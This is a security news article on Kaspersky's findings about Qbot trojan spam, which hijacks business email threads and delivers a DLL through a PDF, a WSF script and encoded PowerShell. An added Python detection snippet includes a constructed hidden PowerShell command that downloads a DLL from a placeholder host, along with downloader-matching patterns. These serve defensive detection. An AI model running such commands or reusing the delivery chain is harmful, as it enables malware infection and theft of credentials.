Qbot Banking Trojan Increasingly Delivered Via Business Emails

Malicious spam email campaigns have been observed to increasingly spread banking Trojans from the QBot (or Qakbot) family using fake business emails.

Kaspersky security researchers discovered malicious campaigns that relied on messages written in different languages, including English, German, Italian, and French.

“The messages were based on actual business letters accessed by the attackers, giving the attackers the opportunity to participate in the communication thread with their own messages,” reads an advisory issued by the company today.

The post, authored by Kaspersky security experts Victoria Vlasova, Andrey Kovtun, and Darya Ivanova, explains that these emails typically prompt the recipient to open an attached PDF file.

“Such simulated business communications can thwart spam tracking and increase the chances of victims being scammed,” explain Vlasova, Kovtun, and Ivanova.

“For believability, the attacker put the sender’s name from a previous letter in the ‘From’ field. However, the sender’s fraudulent email address is different from the actual correspondent’s address.”

Clicking on the attachment triggers the download of an archive from a remote server; the archive is password-protected, and the password is provided in the PDF itself. The downloaded archive contains a WSF (Windows Script File) holding an obfuscated script written in JScript.

“Once the WSF file is deobfuscated, its true payload is revealed: a PowerShell script encoded in Base64 lines,” Kaspersky wrote. “As soon as the user opens the WSF file from the archive, a PowerShell script is run discreetly on the computer and uses wget to download a DLL file from a remote server.”
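The chain just described (script host opens the WSF, a hidden PowerShell with a Base64-encoded command, wget fetching a DLL) is what a defender would look for in process-creation telemetry. The following is an added example, not code from the article or from Kaspersky: it decodes the encoded command and flags that parent/child/download pattern over constructed sample events. The event field names and the download URL are assumptions.

```python
import base64
import re
from typing import List, Optional

def encode_ps(cmd: str) -> str:
    """PowerShell's -EncodedCommand takes Base64 of the UTF-16LE command text."""
    return base64.b64encode(cmd.encode("utf-16le")).decode()

# Constructed sample process-creation events (not real telemetry). Event 0 mirrors the
# article's chain; the URL is a placeholder, not an indicator from the campaign.
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\System32\wscript.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -w hidden -enc "
                + encode_ps("wget http://PLACEHOLDER.example/payload.dll -OutFile $env:TEMP\\p.dll")},
    {"parent": r"C:\Windows\explorer.exe",                      # benign encoded command
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -enc " + encode_ps("Get-Date")},
    {"parent": r"C:\Windows\System32\wscript.exe",              # script host, but no PowerShell
     "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": "notepad.exe"},
]

# -e / -ec / -enc / -EncodedCommand are all accepted spellings of the flag.
ENC_FLAG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
# wget and curl are aliases of Invoke-WebRequest in Windows PowerShell.
DOWNLOADER = re.compile(r"\b(?:wget|curl|iwr|invoke-webrequest|downloadfile)\b", re.I)

def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the decoded -EncodedCommand payload, or None if absent or malformed."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None

def is_wsf_to_powershell_download(event: dict) -> bool:
    """True when a script host spawned PowerShell whose encoded command downloads a DLL."""
    if not event["parent"].lower().endswith(("wscript.exe", "cscript.exe")):
        return False
    if not event["image"].lower().endswith("powershell.exe"):
        return False
    decoded = decode_encoded_command(event["cmdline"])
    if decoded is None:
        return False
    return bool(DOWNLOADER.search(decoded)) and ".dll" in decoded.lower()

def find_suspicious(events: List[dict]) -> List[int]:
    """Indices of events matching the WSF -> PowerShell -> DLL download pattern."""
    return [i for i, e in enumerate(events) if is_wsf_to_powershell_download(e)]
```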

Kaspersky said the newly discovered Trojan variants are not very different from those seen previously.

“As before, bots can extract passwords and cookies from browsers, steal letters from mailboxes, intercept traffic, and provide operators with remote access to infected systems,” the advisory reads.

For more information on Qbot malware, see Qakbot, Analyzing a Modern-day Banking Trojan.

Some variants can download additional malware tools such as CobaltStrike (to spread the infection across corporate networks) and ransomware. Kaspersky also confirms that some Qbot versions turn the victim’s computer into a proxy server, facilitating traffic redirection.

The latest Qbot campaign primarily targeted users from Germany (28.01%), Argentina (9.78%) and Italy (9.58%). It comes months after Qbot was discovered as the most prevalent malware, surpassing Emotet in December 2022. Since then, Emotet has regained the top spot on Check Point’s list.
